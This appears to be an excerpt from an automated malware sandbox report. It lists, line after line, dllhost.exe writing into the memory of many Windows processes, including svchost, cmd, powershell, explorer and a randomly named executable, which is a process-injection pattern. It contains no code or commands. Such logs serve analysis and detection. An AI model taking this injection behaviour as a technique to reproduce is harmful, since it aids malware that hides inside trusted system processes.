Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 9F0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: F40000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 170000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 940000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 620000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 11F0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 690000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: A20000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: C70000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: D30000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: EE0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 3C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: B10000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: C60000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 6E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1060000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 7A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1130000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: E60000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: C70000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 180000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: A00000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 208442D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 20E8B1C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 27B67E10000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 175F9950000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1DB9D660000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 1CC91450000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 261C3DC0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 2220C4F0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 2220AB60000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1B4EB270000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 25872B90000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base: 34B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 24D9FF40000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2D0D4F70000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 123B8520000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 26A87990000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 17953770000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2295D530000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 253067D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1845B390000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1D559040000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 241A9E70000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1CD73160000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2824E860000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21B473C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2086F9D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 17183BC0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23FD3F70000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1D2A4150000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 275BDF30000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1AAC0260000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 203C9F30000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B5645B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1C004F60000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 24E2AB40000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2644ADB0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\spoolsv.exe base: 1990000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 20D25DA0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 26EF5350000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B1C2570000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2108BA90000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 29166900000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13EF0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1988D570000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 13869B40000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1E1CC740000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2855DA70000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2BF199D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 15AF3890000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21A03B80000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\sihost.exe base: 1CD40E40000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 151A6530000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 19E27BC0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 17D7B150000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1BE621A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2252F480000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 184683D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\explorer.exe base: 1350000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1972E260000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 221D5930000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1D1777C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1A633B40000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2928D0A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dllhost.exe base: 13DAB4C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\smartscreen.exe base: 1A22A640000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21C6CF30000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1EF641A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\audiodg.exe base: 1D349350000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 23B60D80000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1DEA1600000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DAC0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1E97F230000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1217AF90000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1A680850000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 192A3140000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 3C70000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dllhost.exe base: 294E53C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1661BCE0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 5F0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 600000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 760000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 900000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1050000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 530000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1030000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 6A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: CC0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1130000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1080000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: DA0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: E70000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: E10000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: CA0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 760000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 14A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 11B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 13C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1220000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: DB0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 700000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 500000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: AC0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 9D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 7A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 3A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: B30000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: E10000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: FF0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1500000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1300000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: B80000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1210000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 9E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 900000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 9C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: AA0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 690000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1130000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1110000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: BF0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 7D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: CC0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 9A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 5B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: B10000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1350000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: F50000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: B70000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 7B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: F90000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1140000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 620000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: DE0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1210000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: C60000
